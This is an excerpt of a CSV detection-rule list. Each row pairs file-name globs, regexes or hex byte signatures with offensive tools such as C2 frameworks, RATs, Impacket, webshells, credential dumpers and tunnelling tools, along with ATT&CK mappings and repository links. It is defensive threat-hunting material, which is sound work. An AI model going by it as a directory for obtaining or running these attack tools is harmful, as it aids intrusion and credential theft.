"*\wmi_killprocname.py*",".{0,1000}\\wmi_killprocname\.py.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","N/A","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","19837"
"*\wmi_killprocname.txt*",".{0,1000}\\wmi_killprocname\.txt.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","N/A","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","19838"
"*\wmi_killprocpid.py*",".{0,1000}\\wmi_killprocpid\.py.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","N/A","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","19839"
"*\wmi_killprocpid.txt*",".{0,1000}\\wmi_killprocpid\.txt.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","N/A","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","19840"
"*\wmievasions.ps1*",".{0,1000}\\wmievasions\.ps1.{0,1000}","offensive_tool_keyword","KerberOPSEC","OPSEC safe Kerberoasting in C#","T1558.003","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/Luct0r/KerberOPSEC","1","0","N/A","N/A","10","2","191","21","2022-06-14T18:10:25Z","2022-01-07T17:20:40Z","19841"
"*\wmiexec.py*",".{0,1000}\\wmiexec\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","19842"
"*\wmiexec.zip*",".{0,1000}\\wmiexec\.zip.{0,1000}","offensive_tool_keyword","NTHASH-FPC","various tools for retrieving windows secrets - Lateral Movement and C2","T1552.002 - T1552.005 - T1555.003 - T1555.005 - T1558 - T1558.003 - T1111 - T1552.001 - T1539 - T1606 - T1602","TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/erwan2212/NTHASH-FPC","1","0","N/A","N/A","10","1","35","9","2023-08-13T16:38:53Z","2019-08-09T11:49:55Z","19843"
"*\WMIHACKER.vbs*",".{0,1000}\\WMIHACKER\.vbs.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","19844"
"*\WMIHACKER.vbs*",".{0,1000}\\WMIHACKER\.vbs.{0,1000}","offensive_tool_keyword","WMIHACKER","Bypass anti-virus software lateral movement command execution test tool - No need 445 Port","T1047 - T1569.002 - T1218 - T1036.005","TA0008 - TA0002 - TA0005","N/A","N/A","Lateral Movement","https://github.com/rootclay/WMIHACKER","1","0","N/A","N/A","9","10","1423","236","2025-01-20T15:37:28Z","2020-07-02T06:57:25Z","19845"
"*\wmihacker_0.4.vbe*",".{0,1000}\\wmihacker_0\.4\.vbe.{0,1000}","offensive_tool_keyword","WMIHACKER","Bypass anti-virus software lateral movement command execution test tool - No need 445 Port","T1047 - T1569.002 - T1218 - T1036.005","TA0008 - TA0002 - TA0005","N/A","N/A","Lateral Movement","https://github.com/rootclay/WMIHACKER","1","0","N/A","N/A","9","10","1423","236","2025-01-20T15:37:28Z","2020-07-02T06:57:25Z","19846"
"*\WMIHACKER_0.6.vbs*",".{0,1000}\\WMIHACKER_0\.6\.vbs.{0,1000}","offensive_tool_keyword","WMIHACKER","Bypass anti-virus software lateral movement command execution test tool - No need 445 Port","T1047 - T1569.002 - T1218 - T1036.005","TA0008 - TA0002 - TA0005","N/A","N/A","Lateral Movement","https://github.com/rootclay/WMIHACKER","1","0","N/A","N/A","9","10","1423","236","2025-01-20T15:37:28Z","2020-07-02T06:57:25Z","19847"
"*\wmipersist.exe*",".{0,1000}\\wmipersist\.exe.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","19848"
"*\wmipersist.py*",".{0,1000}\\wmipersist\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","19849"
"*\wmiquery.py*",".{0,1000}\\wmiquery\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","19850"
"*\WMIReg.exe*",".{0,1000}\\WMIReg\.exe.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","0","N/A","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","19851"
"*\WMIReg.exe*",".{0,1000}\\WMIReg\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","19852"
"*\Worm.dll*",".{0,1000}\\Worm\.dll.{0,1000}","offensive_tool_keyword","Xworm","Malware with wide range of capabilities ranging from RAT to ransomware","T1562 - T1547 - T1056 - T1125 - T1496 - T1486 - T1219 - T1567 - T1564 - T1027","TA0005 - TA0003 - TA0009 - TA0040 - TA0002 - TA0006 - TA0010 - TA0004 - TA0007 - TA0008 - TA0011","N/A","N/A","Malware","https://github.com/guessthatname99/XWorm-RAT-V2.1","1","0","N/A","N/A","10","","N/A","","","","19855"
"*\Worse Linux Shell.php*",".{0,1000}\\Worse\sLinux\sShell\.php.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","N/A","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","19856"
"*\WOW6432Node\Kidlogger*",".{0,1000}\\WOW6432Node\\Kidlogger.{0,1000}","offensive_tool_keyword","kiglogger","malware parental control software - keylogger","T1056.001 - T1113 - T1056.004","TA0006 - TA0009","N/A","N/A","Collection","https://kidlogger.net/download.html","1","0","#registry","registry","10","10","N/A","N/A","N/A","N/A","19859"
"*\wraith.py*",".{0,1000}\\wraith\.py.{0,1000}","offensive_tool_keyword","wraith","A free and open-source, modular Remote Administration Tool (RAT) / Payload Dropper written in Go(lang) with a flexible command and control (C2) system.","T1059 - T1204 - T1105 - T1136 - T1021","TA0002 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/wraith-labs/wraith","1","0","N/A","N/A","10","10","223","49","2023-12-03T22:16:27Z","2020-01-23T17:09:23Z","19863"
"*\wraith-master.zip*",".{0,1000}\\wraith\-master\.zip.{0,1000}","offensive_tool_keyword","wraith","A free and open-source, modular Remote Administration Tool (RAT) / Payload Dropper written in Go(lang) with a flexible command and control (C2) system.","T1059 - T1204 - T1105 - T1136 - T1021","TA0002 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/wraith-labs/wraith","1","0","N/A","N/A","10","10","223","49","2023-12-03T22:16:27Z","2020-01-23T17:09:23Z","19864"
"*\wraith-RAT-payloads*",".{0,1000}\\wraith\-RAT\-payloads.{0,1000}","offensive_tool_keyword","wraith","A free and open-source, modular Remote Administration Tool (RAT) / Payload Dropper written in Go(lang) with a flexible command and control (C2) system.","T1059 - T1204 - T1105 - T1136 - T1021","TA0002 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/wraith-labs/wraith","1","0","N/A","N/A","10","10","223","49","2023-12-03T22:16:27Z","2020-01-23T17:09:23Z","19865"
"*\wraith-server.py*",".{0,1000}\\wraith\-server\.py.{0,1000}","offensive_tool_keyword","wraith","A free and open-source, modular Remote Administration Tool (RAT) / Payload Dropper written in Go(lang) with a flexible command and control (C2) system.","T1059 - T1204 - T1105 - T1136 - T1021","TA0002 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/wraith-labs/wraith","1","0","N/A","N/A","10","10","223","49","2023-12-03T22:16:27Z","2020-01-23T17:09:23Z","19866"
"*\wraith-server_v*.py*",".{0,1000}\\wraith\-server_v.{0,1000}\.py.{0,1000}","offensive_tool_keyword","wraith","A free and open-source, modular Remote Administration Tool (RAT) / Payload Dropper written in Go(lang) with a flexible command and control (C2) system.","T1059 - T1204 - T1105 - T1136 - T1021","TA0002 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/wraith-labs/wraith","1","0","N/A","N/A","10","10","223","49","2023-12-03T22:16:27Z","2020-01-23T17:09:23Z","19867"
"*\WritebleRegistryKeys.txt*",".{0,1000}\\WritebleRegistryKeys\.txt.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","Black Basta","Exploitation tool","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","10","3473","535","2024-11-26T07:50:22Z","2018-03-07T12:51:25Z","19868"
"*\WriteOutputCommand.cs",".{0,1000}\\WriteOutputCommand\.cs","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","0","N/A","N/A","10","10","977","138","2025-04-11T09:25:41Z","2018-11-28T21:07:51Z","19869"
"*\WSAAcceptBackdoor.*",".{0,1000}\\WSAAcceptBackdoor\..{0,1000}","offensive_tool_keyword","WSAAcceptBackdoor","Winsock accept() Backdoor Implant","T1574.001 - T1059 - T1213 - T1105 - T1546","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/EgeBalci/WSAAcceptBackdoor","1","0","N/A","N/A","10","2","112","23","2021-02-13T19:18:41Z","2021-02-13T15:59:01Z","19870"
"*\WSAAcceptBackdoor-main*",".{0,1000}\\WSAAcceptBackdoor\-main.{0,1000}","offensive_tool_keyword","WSAAcceptBackdoor","Winsock accept() Backdoor Implant","T1574.001 - T1059 - T1213 - T1105 - T1546","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/EgeBalci/WSAAcceptBackdoor","1","0","N/A","N/A","10","2","112","23","2021-02-13T19:18:41Z","2021-02-13T15:59:01Z","19871"
"*\wscriptshell.py*",".{0,1000}\\wscriptshell\.py.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","N/A","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","19872"
"*\wscriptshell.txt*",".{0,1000}\\wscriptshell\.txt.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","N/A","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","19873"
"*\ws-dirs.txt*",".{0,1000}\\ws\-dirs\.txt.{0,1000}","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Reconnaissance","https://github.com/xmendez/wfuzz","1","0","#linux","N/A","9","10","6148","1384","2024-08-18T01:36:10Z","2014-10-22T21:23:49Z","19874"
"*\ws-files.txt*",".{0,1000}\\ws\-files\.txt.{0,1000}","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Reconnaissance","https://github.com/xmendez/wfuzz","1","0","#linux","N/A","9","10","6148","1384","2024-08-18T01:36:10Z","2014-10-22T21:23:49Z","19875"
"*\WSManWinRM.ps1*",".{0,1000}\\WSManWinRM\.ps1.{0,1000}","offensive_tool_keyword","WSMan-WinRM","remote commands over WinRM using the WSMan.Automation COM object","T1021.004 - T1059.001","TA0008 - TA0002","N/A","N/A","Lateral Movement","https://github.com/bohops/WSMan-WinRM","1","0","N/A","N/A","10","3","236","40","2020-05-12T16:49:01Z","2020-05-12T01:30:42Z","19876"
"*\WSPCoerce.cs*",".{0,1000}\\WSPCoerce\.cs.{0,1000}","offensive_tool_keyword","WSPCoerce","PoC to coerce authentication from Windows hosts using MS-WSP","T1557.001 - T1078.003 - T1059.003","TA0006 - TA0004 - TA0002","N/A","N/A","Exploitation tool","https://github.com/slemire/WSPCoerce","1","0","N/A","N/A","9","3","235","31","2023-09-07T14:43:36Z","2023-07-26T17:20:42Z","19877"
"*\wstunnel.exe",".{0,1000}\\wstunnel\.exe","offensive_tool_keyword","wstunnel","Tunnel all your traffic over websocket protocol - Bypass firewalls/DPI - Static binary available","T1572 - T1090 - T1071","TA0005- TA0010 - TA0011","N/A","Scattered Spider*","Data Exfiltration","https://github.com/erebe/wstunnel","1","0","N/A","N/A","10","10","4759","404","2025-04-15T11:07:11Z","2016-05-14T23:58:43Z","19878"
"*\wstunnel\certs\*",".{0,1000}\\wstunnel\\certs\\.{0,1000}","offensive_tool_keyword","wstunnel","Tunnel all your traffic over websocket protocol - Bypass firewalls/DPI - Static binary available","T1572 - T1090 - T1071","TA0005- TA0010 - TA0011","N/A","Scattered Spider*","Data Exfiltration","https://github.com/erebe/wstunnel","1","0","N/A","N/A","10","10","4759","404","2025-04-15T11:07:11Z","2016-05-14T23:58:43Z","19879"
"*\wwwwwwwwwwwwntdll.dll*",".{0,1000}\\wwwwwwwwwwwwntdll\.dll.{0,1000}","offensive_tool_keyword","GlllPowerloader","Sample to bypass AV/EDR and upload to transfer.sh","T1059.001 - T1202 - T1105 - T1027 - T1036 - T1070 - T1031 - T1071 - T1048","TA0005 - TA0004 - TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/INotGreen/GlllPowerloader","1","0","N/A","N/A","10","5","451","105","2024-04-12T07:28:24Z","2022-04-26T12:10:58Z","19882"
"*\x24\xC3\C:\\Windows\\System32\\calc.exe\x00*",".{0,1000}\\x24\\xC3\\C\:\\\\Windows\\\\System32\\\\calc\.exe\\x00.{0,1000}","offensive_tool_keyword","PoolParty","A set of fully-undetectable process injection techniques abusing Windows Thread Pools","T1055","TA0005","N/A","Black Basta","Defense Evasion","https://github.com/SafeBreach-Labs/PoolParty","1","0","N/A","N/A","9","10","1088","143","2023-12-11T10:52:05Z","2023-05-21T16:13:32Z","19883"
"*\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x77\x68\x6f\x61\x6d\x69*",".{0,1000}\\x2f\\x75\\x73\\x72\\x2f\\x62\\x69\\x6e\\x2f\\x77\\x68\\x6f\\x61\\x6d\\x69.{0,1000}","offensive_tool_keyword","whoami","whoami is a legitimate command used to identify the current user executing the command in a terminal or command prompt.whoami can be used to gather information about the current user's privileges. credentials. and account name. which can then be used for Lateral Movement. privilege escalation. or targeted attacks within the compromised network.","T1003.001 - T1087 - T1057 ","TA0006 - TA0007","N/A","Black Basta","Collection","N/A","1","0","N/A","N/A","N/A","10","N/A","N/A","N/A","N/A","19884"
"*\x44\x8b\x01\x44\x39\x42*",".{0,1000}\\x44\\x8b\\x01\\x44\\x39\\x42.{0,1000}","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","Black Basta","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","N/A","10","2989","394","2025-02-27T20:37:07Z","2018-05-25T22:21:20Z","19885"
"*\x4d\x5a\x90\x00\x03\x00\x00\x00\x04\x00\x00\x00\xff\xff\x00\x00\xb8\x00\x00\x00\x00\x00\x00\x00\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xf8\x00\x00\x00\x0e\x1f\xba\x0e\x00\xb4\x09\xcd\x21\xb8\x01\x4c\xcd\x21\x54\x68\x69\x73\x20\x70\x72*",".{0,1000}\\x4d\\x5a\\x90\\x00\\x03\\x00\\x00\\x00\\x04\\x00\\x00\\x00\\xff\\xff\\x00\\x00\\xb8\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x40\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xf8\\x00\\x00\\x00\\x0e\\x1f\\xba\\x0e\\x00\\xb4\\x09\\xcd\\x21\\xb8\\x01\\x4c\\xcd\\x21\\x54\\x68\\x69\\x73\\x20\\x70\\x72.{0,1000}","offensive_tool_keyword","OffensiveLua","Offensive Lua is a collection of offensive security scripts written in Lua with FFI","T1059  - T1218.011 - T1105 - T1021.002 - T1564.001 - T1112 - T1113 - T1204.002 - T1547.002","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0011","N/A","N/A","Exploitation tool","https://github.com/hackerhouse-opensource/OffensiveLua","1","0","N/A","N/A","8","2","184","25","2023-11-17T00:35:10Z","2023-10-25T17:21:13Z","19886"
"*\x64\Debug\Appblock.exe*",".{0,1000}\\x64\\Debug\\Appblock\.exe.{0,1000}","offensive_tool_keyword","shutter","The goal of Shutter is to manage windows network stack communication via Windows Filtering Platform. Management can include blocking or permiting traffic based on IP or an executable that initiates or receives the traffic.","T1562 - T1027","TA0005 - TA0007","N/A","N/A","Defense Evasion","https://github.com/dsnezhkov/shutter","1","0","N/A","N/A","10","2","116","15","2021-05-12T19:05:14Z","2021-05-12T18:51:03Z","19887"
"*\x64\Release\indirect.exe *",".{0,1000}\\x64\\Release\\indirect\.exe\s.{0,1000}","offensive_tool_keyword","DarkWidow","Indirect Dynamic Syscall SSN + Syscall address sorting via Modified TartarusGate approach + Remote Process Injection via APC Early Bird + Spawns a sacrificial Process as target process + (ACG+BlockDll) mitigation policy on spawned process + PPID spoofing (Emotet method) + Api resolving from TIB + API hashing","T1055 - T1055.012 - T1055.002 - T1098 - T1027 - T1027.001 - T1070.004 - T1036 - T1134 - T1140","TA0005 - TA0003 - TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/reveng007/DarkWidow","1","0","N/A","N/A","10","7","671","91","2025-03-12T21:58:25Z","2023-07-24T13:59:16Z","19889"
"*\x64\Stardust.asm*",".{0,1000}\\x64\\Stardust\.asm.{0,1000}","offensive_tool_keyword","Stardust","An modern 64-bit position independent implant template","T1055 - T1105 - T1055.012 - T1027 - T1218","TA0005 - TA0003 - TA0004","N/A","N/A","Defense Evasion","https://github.com/Cracked5pider/Stardust","1","0","N/A","N/A","10","10","1193","193","2025-03-21T11:41:09Z","2022-02-20T01:23:35Z","19890"
"*\x83\x64\x24\x30\x00\x48\x8d\x45\xe0\x44\x8b\x4d\xd8\x48\x8d\x15*",".{0,1000}\\x83\\x64\\x24\\x30\\x00\\x48\\x8d\\x45\\xe0\\x44\\x8b\\x4d\\xd8\\x48\\x8d\\x15.{0,1000}","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","Black Basta","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","N/A","10","2989","394","2025-02-27T20:37:07Z","2018-05-25T22:21:20Z","19891"
"*\x8b\x31\x39\x72\x10\x75*",".{0,1000}\\x8b\\x31\\x39\\x72\\x10\\x75.{0,1000}","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","Black Basta","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","N/A","10","2989","394","2025-02-27T20:37:07Z","2018-05-25T22:21:20Z","19893"
"*\Xclipboard.ps1*",".{0,1000}\\Xclipboard\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","0","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","19894"
"*\Xena RAT - 2.0.0.exe*",".{0,1000}\\Xena\sRAT\s\-\s2\.0\.0\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","19895"
"*\xeno rat server.*",".{0,1000}\\xeno\srat\sserver\..{0,1000}","offensive_tool_keyword","xeno-rat","Xeno-RAT is an open-source remote access tool (RAT) developed in C# providing a comprehensive set of features for remote system management. Has features such as HVNC - live microphone - reverse proxy and much much more","T1133 - T1021.001 - T1563.002 - T1113 - T1123 - T1571 - T1090","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011","N/A","N/A","C2","https://github.com/moom825/xeno-rat","1","0","N/A","N/A","10","10","1225","323","2024-03-05T06:22:36Z","2023-10-17T06:41:56Z","19896"
"*\xeno rat server\*",".{0,1000}\\xeno\srat\sserver\\.{0,1000}","offensive_tool_keyword","xeno-rat","Xeno-RAT is an open-source remote access tool (RAT) developed in C# providing a comprehensive set of features for remote system management. Has features such as HVNC - live microphone - reverse proxy and much much more","T1133 - T1021.001 - T1563.002 - T1113 - T1123 - T1571 - T1090","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011","N/A","N/A","C2","https://github.com/moom825/xeno-rat","1","0","N/A","N/A","10","10","1225","323","2024-03-05T06:22:36Z","2023-10-17T06:41:56Z","19897"
"*\xeno-rat\*",".{0,1000}\\xeno\-rat\\.{0,1000}","offensive_tool_keyword","xeno-rat","Xeno-RAT is an open-source remote access tool (RAT) developed in C# providing a comprehensive set of features for remote system management. Has features such as HVNC - live microphone - reverse proxy and much much more","T1133 - T1021.001 - T1563.002 - T1113 - T1123 - T1571 - T1090","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011","N/A","N/A","C2","https://github.com/moom825/xeno-rat","1","0","N/A","N/A","10","10","1225","323","2024-03-05T06:22:36Z","2023-10-17T06:41:56Z","19898"
